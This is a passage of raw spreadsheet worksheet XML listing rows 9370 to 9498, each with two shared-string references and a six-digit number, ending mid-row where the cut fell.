    <row r="9370" spans="1:3">
      <c r="A9370" s="28" t="s">
        <v>21609</v>
      </c>
      <c r="B9370" s="14" t="s">
        <v>9289</v>
      </c>
      <c r="C9370" s="15">
        <v>268862</v>
      </c>
    </row>
    <row r="9371" spans="1:3">
      <c r="A9371" s="28" t="s">
        <v>21610</v>
      </c>
      <c r="B9371" s="14" t="s">
        <v>10735</v>
      </c>
      <c r="C9371" s="15">
        <v>268863</v>
      </c>
    </row>
    <row r="9372" spans="1:3">
      <c r="A9372" s="28" t="s">
        <v>21611</v>
      </c>
      <c r="B9372" s="14" t="s">
        <v>13068</v>
      </c>
      <c r="C9372" s="15">
        <v>268864</v>
      </c>
    </row>
    <row r="9373" spans="1:3">
      <c r="A9373" s="28" t="s">
        <v>21612</v>
      </c>
      <c r="B9373" s="14" t="s">
        <v>13069</v>
      </c>
      <c r="C9373" s="15">
        <v>268865</v>
      </c>
    </row>
    <row r="9374" spans="1:3">
      <c r="A9374" s="28" t="s">
        <v>21613</v>
      </c>
      <c r="B9374" s="14" t="s">
        <v>13070</v>
      </c>
      <c r="C9374" s="15">
        <v>268866</v>
      </c>
    </row>
    <row r="9375" spans="1:3">
      <c r="A9375" s="28" t="s">
        <v>21614</v>
      </c>
      <c r="B9375" s="14" t="s">
        <v>10739</v>
      </c>
      <c r="C9375" s="15">
        <v>268867</v>
      </c>
    </row>
    <row r="9376" spans="1:3">
      <c r="A9376" s="28" t="s">
        <v>23713</v>
      </c>
      <c r="B9376" s="14" t="s">
        <v>13071</v>
      </c>
      <c r="C9376" s="15">
        <v>268868</v>
      </c>
    </row>
    <row r="9377" spans="1:3">
      <c r="A9377" s="28" t="s">
        <v>23714</v>
      </c>
      <c r="B9377" s="14" t="s">
        <v>13072</v>
      </c>
      <c r="C9377" s="15">
        <v>268869</v>
      </c>
    </row>
    <row r="9378" spans="1:3">
      <c r="A9378" s="28" t="s">
        <v>21268</v>
      </c>
      <c r="B9378" s="14" t="s">
        <v>10382</v>
      </c>
      <c r="C9378" s="15">
        <v>268870</v>
      </c>
    </row>
    <row r="9379" spans="1:3">
      <c r="A9379" s="28" t="s">
        <v>23715</v>
      </c>
      <c r="B9379" s="14" t="s">
        <v>13073</v>
      </c>
      <c r="C9379" s="15">
        <v>268871</v>
      </c>
    </row>
    <row r="9380" spans="1:3">
      <c r="A9380" s="28" t="s">
        <v>21615</v>
      </c>
      <c r="B9380" s="14" t="s">
        <v>13074</v>
      </c>
      <c r="C9380" s="15">
        <v>268872</v>
      </c>
    </row>
    <row r="9381" spans="1:3">
      <c r="A9381" s="28" t="s">
        <v>21616</v>
      </c>
      <c r="B9381" s="14" t="s">
        <v>10741</v>
      </c>
      <c r="C9381" s="15">
        <v>268873</v>
      </c>
    </row>
    <row r="9382" spans="1:3">
      <c r="A9382" s="28" t="s">
        <v>19016</v>
      </c>
      <c r="B9382" s="14" t="s">
        <v>7436</v>
      </c>
      <c r="C9382" s="15">
        <v>268874</v>
      </c>
    </row>
    <row r="9383" spans="1:3">
      <c r="A9383" s="28" t="s">
        <v>21617</v>
      </c>
      <c r="B9383" s="14" t="s">
        <v>10743</v>
      </c>
      <c r="C9383" s="15">
        <v>268875</v>
      </c>
    </row>
    <row r="9384" spans="1:3">
      <c r="A9384" s="28" t="s">
        <v>21618</v>
      </c>
      <c r="B9384" s="14" t="s">
        <v>10743</v>
      </c>
      <c r="C9384" s="15">
        <v>268877</v>
      </c>
    </row>
    <row r="9385" spans="1:3">
      <c r="A9385" s="28" t="s">
        <v>21824</v>
      </c>
      <c r="B9385" s="14" t="s">
        <v>8556</v>
      </c>
      <c r="C9385" s="15">
        <v>268878</v>
      </c>
    </row>
    <row r="9386" spans="1:3">
      <c r="A9386" s="28" t="s">
        <v>23716</v>
      </c>
      <c r="B9386" s="14" t="s">
        <v>13075</v>
      </c>
      <c r="C9386" s="15">
        <v>268879</v>
      </c>
    </row>
    <row r="9387" spans="1:3">
      <c r="A9387" s="28" t="s">
        <v>19017</v>
      </c>
      <c r="B9387" s="14" t="s">
        <v>13076</v>
      </c>
      <c r="C9387" s="15">
        <v>268894</v>
      </c>
    </row>
    <row r="9388" spans="1:3">
      <c r="A9388" s="28" t="s">
        <v>18919</v>
      </c>
      <c r="B9388" s="14" t="s">
        <v>7337</v>
      </c>
      <c r="C9388" s="15">
        <v>268898</v>
      </c>
    </row>
    <row r="9389" spans="1:3">
      <c r="A9389" s="28" t="s">
        <v>22089</v>
      </c>
      <c r="B9389" s="14" t="s">
        <v>11210</v>
      </c>
      <c r="C9389" s="15">
        <v>268899</v>
      </c>
    </row>
    <row r="9390" spans="1:3">
      <c r="A9390" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9390" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9390" s="15">
        <v>269001</v>
      </c>
    </row>
    <row r="9391" spans="1:3">
      <c r="A9391" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9391" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9391" s="15">
        <v>269002</v>
      </c>
    </row>
    <row r="9392" spans="1:3">
      <c r="A9392" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9392" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9392" s="15">
        <v>269003</v>
      </c>
    </row>
    <row r="9393" spans="1:3">
      <c r="A9393" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9393" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9393" s="15">
        <v>269009</v>
      </c>
    </row>
    <row r="9394" spans="1:3">
      <c r="A9394" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9394" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9394" s="15">
        <v>269011</v>
      </c>
    </row>
    <row r="9395" spans="1:3">
      <c r="A9395" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9395" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9395" s="15">
        <v>269012</v>
      </c>
    </row>
    <row r="9396" spans="1:3">
      <c r="A9396" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9396" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9396" s="15">
        <v>269015</v>
      </c>
    </row>
    <row r="9397" spans="1:3">
      <c r="A9397" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9397" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9397" s="15">
        <v>269018</v>
      </c>
    </row>
    <row r="9398" spans="1:3">
      <c r="A9398" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9398" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9398" s="15">
        <v>269021</v>
      </c>
    </row>
    <row r="9399" spans="1:3">
      <c r="A9399" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9399" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9399" s="15">
        <v>269031</v>
      </c>
    </row>
    <row r="9400" spans="1:3">
      <c r="A9400" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9400" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9400" s="15">
        <v>269033</v>
      </c>
    </row>
    <row r="9401" spans="1:3">
      <c r="A9401" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9401" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9401" s="15">
        <v>269036</v>
      </c>
    </row>
    <row r="9402" spans="1:3">
      <c r="A9402" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9402" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9402" s="15">
        <v>269045</v>
      </c>
    </row>
    <row r="9403" spans="1:3">
      <c r="A9403" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9403" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9403" s="15">
        <v>269047</v>
      </c>
    </row>
    <row r="9404" spans="1:3">
      <c r="A9404" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9404" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9404" s="15">
        <v>269053</v>
      </c>
    </row>
    <row r="9405" spans="1:3">
      <c r="A9405" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9405" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9405" s="15">
        <v>269055</v>
      </c>
    </row>
    <row r="9406" spans="1:3">
      <c r="A9406" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9406" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9406" s="15">
        <v>269057</v>
      </c>
    </row>
    <row r="9407" spans="1:3">
      <c r="A9407" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9407" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9407" s="15">
        <v>269062</v>
      </c>
    </row>
    <row r="9408" spans="1:3">
      <c r="A9408" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9408" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9408" s="15">
        <v>269064</v>
      </c>
    </row>
    <row r="9409" spans="1:3">
      <c r="A9409" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9409" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9409" s="15">
        <v>269067</v>
      </c>
    </row>
    <row r="9410" spans="1:3">
      <c r="A9410" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9410" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9410" s="15">
        <v>269068</v>
      </c>
    </row>
    <row r="9411" spans="1:3">
      <c r="A9411" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9411" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9411" s="15">
        <v>269069</v>
      </c>
    </row>
    <row r="9412" spans="1:3">
      <c r="A9412" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9412" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9412" s="15">
        <v>269070</v>
      </c>
    </row>
    <row r="9413" spans="1:3">
      <c r="A9413" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9413" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9413" s="15">
        <v>269073</v>
      </c>
    </row>
    <row r="9414" spans="1:3">
      <c r="A9414" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9414" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9414" s="15">
        <v>269075</v>
      </c>
    </row>
    <row r="9415" spans="1:3">
      <c r="A9415" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9415" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9415" s="15">
        <v>269076</v>
      </c>
    </row>
    <row r="9416" spans="1:3">
      <c r="A9416" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9416" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9416" s="15">
        <v>269077</v>
      </c>
    </row>
    <row r="9417" spans="1:3">
      <c r="A9417" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9417" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9417" s="15">
        <v>269093</v>
      </c>
    </row>
    <row r="9418" spans="1:3">
      <c r="A9418" s="28" t="s">
        <v>21619</v>
      </c>
      <c r="B9418" s="14" t="s">
        <v>13077</v>
      </c>
      <c r="C9418" s="15">
        <v>269095</v>
      </c>
    </row>
    <row r="9419" spans="1:3">
      <c r="A9419" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9419" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9419" s="15">
        <v>269104</v>
      </c>
    </row>
    <row r="9420" spans="1:3">
      <c r="A9420" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9420" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9420" s="15">
        <v>269108</v>
      </c>
    </row>
    <row r="9421" spans="1:3">
      <c r="A9421" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9421" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9421" s="15">
        <v>269110</v>
      </c>
    </row>
    <row r="9422" spans="1:3">
      <c r="A9422" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9422" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9422" s="15">
        <v>269111</v>
      </c>
    </row>
    <row r="9423" spans="1:3">
      <c r="A9423" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9423" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9423" s="15">
        <v>269114</v>
      </c>
    </row>
    <row r="9424" spans="1:3">
      <c r="A9424" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9424" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9424" s="15">
        <v>269115</v>
      </c>
    </row>
    <row r="9425" spans="1:3">
      <c r="A9425" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9425" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9425" s="15">
        <v>269116</v>
      </c>
    </row>
    <row r="9426" spans="1:3">
      <c r="A9426" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9426" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9426" s="15">
        <v>269117</v>
      </c>
    </row>
    <row r="9427" spans="1:3">
      <c r="A9427" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9427" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9427" s="15">
        <v>269118</v>
      </c>
    </row>
    <row r="9428" spans="1:3">
      <c r="A9428" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9428" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9428" s="15">
        <v>269120</v>
      </c>
    </row>
    <row r="9429" spans="1:3">
      <c r="A9429" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9429" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9429" s="15">
        <v>269121</v>
      </c>
    </row>
    <row r="9430" spans="1:3">
      <c r="A9430" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9430" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9430" s="15">
        <v>269122</v>
      </c>
    </row>
    <row r="9431" spans="1:3">
      <c r="A9431" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9431" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9431" s="15">
        <v>269124</v>
      </c>
    </row>
    <row r="9432" spans="1:3">
      <c r="A9432" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9432" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9432" s="15">
        <v>269133</v>
      </c>
    </row>
    <row r="9433" spans="1:3">
      <c r="A9433" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9433" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9433" s="15">
        <v>269150</v>
      </c>
    </row>
    <row r="9434" spans="1:3">
      <c r="A9434" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9434" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9434" s="15">
        <v>269151</v>
      </c>
    </row>
    <row r="9435" spans="1:3">
      <c r="A9435" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9435" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9435" s="15">
        <v>269200</v>
      </c>
    </row>
    <row r="9436" spans="1:3">
      <c r="A9436" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9436" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9436" s="15">
        <v>269201</v>
      </c>
    </row>
    <row r="9437" spans="1:3">
      <c r="A9437" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9437" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9437" s="15">
        <v>269204</v>
      </c>
    </row>
    <row r="9438" spans="1:3">
      <c r="A9438" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9438" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9438" s="15">
        <v>269206</v>
      </c>
    </row>
    <row r="9439" spans="1:3">
      <c r="A9439" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9439" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9439" s="15">
        <v>269207</v>
      </c>
    </row>
    <row r="9440" spans="1:3">
      <c r="A9440" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9440" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9440" s="15">
        <v>269210</v>
      </c>
    </row>
    <row r="9441" spans="1:3">
      <c r="A9441" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9441" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9441" s="15">
        <v>269212</v>
      </c>
    </row>
    <row r="9442" spans="1:3">
      <c r="A9442" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9442" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9442" s="15">
        <v>269213</v>
      </c>
    </row>
    <row r="9443" spans="1:3">
      <c r="A9443" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9443" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9443" s="15">
        <v>269214</v>
      </c>
    </row>
    <row r="9444" spans="1:3">
      <c r="A9444" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9444" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9444" s="15">
        <v>269215</v>
      </c>
    </row>
    <row r="9445" spans="1:3">
      <c r="A9445" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9445" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9445" s="15">
        <v>269216</v>
      </c>
    </row>
    <row r="9446" spans="1:3">
      <c r="A9446" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9446" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9446" s="15">
        <v>269217</v>
      </c>
    </row>
    <row r="9447" spans="1:3">
      <c r="A9447" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9447" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9447" s="15">
        <v>269219</v>
      </c>
    </row>
    <row r="9448" spans="1:3">
      <c r="A9448" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9448" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9448" s="15">
        <v>269224</v>
      </c>
    </row>
    <row r="9449" spans="1:3">
      <c r="A9449" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9449" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9449" s="15">
        <v>269244</v>
      </c>
    </row>
    <row r="9450" spans="1:3">
      <c r="A9450" s="28" t="s">
        <v>359</v>
      </c>
      <c r="B9450" s="14" t="s">
        <v>13080</v>
      </c>
      <c r="C9450" s="15">
        <v>269250</v>
      </c>
    </row>
    <row r="9451" spans="1:3">
      <c r="A9451" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9451" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9451" s="15">
        <v>269260</v>
      </c>
    </row>
    <row r="9452" spans="1:3">
      <c r="A9452" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9452" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9452" s="15">
        <v>269261</v>
      </c>
    </row>
    <row r="9453" spans="1:3">
      <c r="A9453" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9453" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9453" s="15">
        <v>269262</v>
      </c>
    </row>
    <row r="9454" spans="1:3">
      <c r="A9454" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9454" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9454" s="15">
        <v>269264</v>
      </c>
    </row>
    <row r="9455" spans="1:3">
      <c r="A9455" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9455" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9455" s="15">
        <v>269266</v>
      </c>
    </row>
    <row r="9456" spans="1:3">
      <c r="A9456" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9456" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9456" s="15">
        <v>269267</v>
      </c>
    </row>
    <row r="9457" spans="1:3">
      <c r="A9457" s="28" t="s">
        <v>21620</v>
      </c>
      <c r="B9457" s="14" t="s">
        <v>13079</v>
      </c>
      <c r="C9457" s="15">
        <v>269271</v>
      </c>
    </row>
    <row r="9458" spans="1:3">
      <c r="A9458" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9458" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9458" s="15">
        <v>269300</v>
      </c>
    </row>
    <row r="9459" spans="1:3">
      <c r="A9459" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9459" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9459" s="15">
        <v>269301</v>
      </c>
    </row>
    <row r="9460" spans="1:3">
      <c r="A9460" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9460" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9460" s="15">
        <v>269302</v>
      </c>
    </row>
    <row r="9461" spans="1:3">
      <c r="A9461" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9461" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9461" s="15">
        <v>269304</v>
      </c>
    </row>
    <row r="9462" spans="1:3">
      <c r="A9462" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9462" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9462" s="15">
        <v>269306</v>
      </c>
    </row>
    <row r="9463" spans="1:3">
      <c r="A9463" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9463" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9463" s="15">
        <v>269308</v>
      </c>
    </row>
    <row r="9464" spans="1:3">
      <c r="A9464" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9464" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9464" s="15">
        <v>269312</v>
      </c>
    </row>
    <row r="9465" spans="1:3">
      <c r="A9465" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9465" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9465" s="15">
        <v>269314</v>
      </c>
    </row>
    <row r="9466" spans="1:3">
      <c r="A9466" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9466" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9466" s="15">
        <v>269315</v>
      </c>
    </row>
    <row r="9467" spans="1:3">
      <c r="A9467" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9467" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9467" s="15">
        <v>269324</v>
      </c>
    </row>
    <row r="9468" spans="1:3">
      <c r="A9468" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9468" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9468" s="15">
        <v>269326</v>
      </c>
    </row>
    <row r="9469" spans="1:3">
      <c r="A9469" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9469" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9469" s="15">
        <v>269328</v>
      </c>
    </row>
    <row r="9470" spans="1:3">
      <c r="A9470" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9470" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9470" s="15">
        <v>269330</v>
      </c>
    </row>
    <row r="9471" spans="1:3">
      <c r="A9471" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9471" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9471" s="15">
        <v>269332</v>
      </c>
    </row>
    <row r="9472" spans="1:3">
      <c r="A9472" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9472" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9472" s="15">
        <v>269336</v>
      </c>
    </row>
    <row r="9473" spans="1:3">
      <c r="A9473" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9473" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9473" s="15">
        <v>269338</v>
      </c>
    </row>
    <row r="9474" spans="1:3">
      <c r="A9474" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9474" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9474" s="15">
        <v>269366</v>
      </c>
    </row>
    <row r="9475" spans="1:3">
      <c r="A9475" s="28" t="s">
        <v>19020</v>
      </c>
      <c r="B9475" s="14" t="s">
        <v>13081</v>
      </c>
      <c r="C9475" s="15">
        <v>269374</v>
      </c>
    </row>
    <row r="9476" spans="1:3">
      <c r="A9476" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9476" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9476" s="15">
        <v>269402</v>
      </c>
    </row>
    <row r="9477" spans="1:3">
      <c r="A9477" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9477" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9477" s="15">
        <v>269404</v>
      </c>
    </row>
    <row r="9478" spans="1:3">
      <c r="A9478" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9478" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9478" s="15">
        <v>269410</v>
      </c>
    </row>
    <row r="9479" spans="1:3">
      <c r="A9479" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9479" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9479" s="15">
        <v>269414</v>
      </c>
    </row>
    <row r="9480" spans="1:3">
      <c r="A9480" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9480" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9480" s="15">
        <v>269422</v>
      </c>
    </row>
    <row r="9481" spans="1:3">
      <c r="A9481" s="28" t="s">
        <v>21621</v>
      </c>
      <c r="B9481" s="14" t="s">
        <v>13078</v>
      </c>
      <c r="C9481" s="15">
        <v>269424</v>
      </c>
    </row>
    <row r="9482" spans="1:3">
      <c r="A9482" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9482" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9482" s="15">
        <v>269426</v>
      </c>
    </row>
    <row r="9483" spans="1:3">
      <c r="A9483" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9483" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9483" s="15">
        <v>269427</v>
      </c>
    </row>
    <row r="9484" spans="1:3">
      <c r="A9484" s="28" t="s">
        <v>21622</v>
      </c>
      <c r="B9484" s="14" t="s">
        <v>8803</v>
      </c>
      <c r="C9484" s="15">
        <v>269428</v>
      </c>
    </row>
    <row r="9485" spans="1:3">
      <c r="A9485" s="28" t="s">
        <v>23717</v>
      </c>
      <c r="B9485" s="14" t="s">
        <v>13082</v>
      </c>
      <c r="C9485" s="15">
        <v>269438</v>
      </c>
    </row>
    <row r="9486" spans="1:3">
      <c r="A9486" s="28" t="s">
        <v>23718</v>
      </c>
      <c r="B9486" s="14" t="s">
        <v>13083</v>
      </c>
      <c r="C9486" s="15">
        <v>269440</v>
      </c>
    </row>
    <row r="9487" spans="1:3">
      <c r="A9487" s="28" t="s">
        <v>23370</v>
      </c>
      <c r="B9487" s="14" t="s">
        <v>13084</v>
      </c>
      <c r="C9487" s="15">
        <v>269442</v>
      </c>
    </row>
    <row r="9488" spans="1:3">
      <c r="A9488" s="28" t="s">
        <v>23719</v>
      </c>
      <c r="B9488" s="14" t="s">
        <v>13085</v>
      </c>
      <c r="C9488" s="15">
        <v>269443</v>
      </c>
    </row>
    <row r="9489" spans="1:3">
      <c r="A9489" s="28" t="s">
        <v>23366</v>
      </c>
      <c r="B9489" s="14" t="s">
        <v>12754</v>
      </c>
      <c r="C9489" s="15">
        <v>269444</v>
      </c>
    </row>
    <row r="9490" spans="1:3">
      <c r="A9490" s="28" t="s">
        <v>23720</v>
      </c>
      <c r="B9490" s="14" t="s">
        <v>13086</v>
      </c>
      <c r="C9490" s="15">
        <v>269445</v>
      </c>
    </row>
    <row r="9491" spans="1:3">
      <c r="A9491" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9491" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9491" s="15">
        <v>269450</v>
      </c>
    </row>
    <row r="9492" spans="1:3">
      <c r="A9492" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9492" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9492" s="15">
        <v>269451</v>
      </c>
    </row>
    <row r="9493" spans="1:3">
      <c r="A9493" s="28" t="s">
        <v>21623</v>
      </c>
      <c r="B9493" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9493" s="15">
        <v>269454</v>
      </c>
    </row>
    <row r="9494" spans="1:3">
      <c r="A9494" s="28" t="s">
        <v>21623</v>
      </c>
      <c r="B9494" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9494" s="15">
        <v>269456</v>
      </c>
    </row>
    <row r="9495" spans="1:3">
      <c r="A9495" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9495" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9495" s="15">
        <v>269458</v>
      </c>
    </row>
    <row r="9496" spans="1:3">
      <c r="A9496" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9496" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9496" s="15">
        <v>269460</v>
      </c>
    </row>
    <row r="9497" spans="1:3">
      <c r="A9497" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9497" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9497" s="15">
        <v>269462</v>
      </c>
    </row>
    <row r="9498" spans="1:3">
      <c r="A9498" s="28" t="s">
        <v>21624</v>
      </c>
      <c r="B9498" s="14" t="s">
        <v>13087</v>
      </c>
      <c r="C9498" s="15">
        <v>269464</v>
      </c>
    </row>
    <row r="9499" spans="1:3">
      <c r="A9499" s="28" t="s">
